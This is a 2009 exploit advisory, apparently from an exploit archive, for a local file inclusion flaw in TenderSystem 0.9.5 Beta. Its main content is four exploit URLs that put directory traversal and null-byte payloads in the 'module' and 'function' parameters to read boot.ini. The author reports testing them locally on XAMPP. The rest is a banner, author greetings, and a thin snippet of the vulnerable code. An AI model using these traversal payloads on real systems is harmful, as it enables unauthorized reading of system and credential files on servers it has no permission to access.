Home / exploits tendersystem-lfi.txt
Posted on 15 December 2009
__________ __ __ .___ __ .__ \______ \_____ ____ | | __ _____/ |_ __| _/____ _____ _/ |_| |__ | ___/\__ _/ ___| |/ // __ __/ __ |/ __ \__ \ __ | \n| | / __ \ \___| < ___/| | / /_/ ___/ / __ | | | Y \n|____| (____ /\___ >__|_ \___ >__| \____ |\___ >____ /__| |___| / / / / / / / / / ------------------------------------------------------------------------------------------- Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS I was unable to get this to work on a Linux server. Further testing may be required. ------------------------------------------------------------------------------------------ Target: TenderSystem Version: 0.9.5 Beta Site http://www.tendersystem.com/ Demo: http://demo.tendersystem.com/ Date: 2-14-2009 ------------------------------------------------------------------------------------------- Author: Packetdeath Homepage: www.ssteam.ws Contact: yaii_abc@hotmail.com ------------------------------------------------------------------------------------------- Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws ------------------------------------------------------------------------------------------- Exploit: http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg ------------------------------------------------------------------------------------------------------- Vuln code in main.php: // load required files require('modules/generic/ts_main.php'); ?> ------------------------------------------------------------------------------------------------------- Some things are better left unsaid <3 ... That is all. /Packetdeath
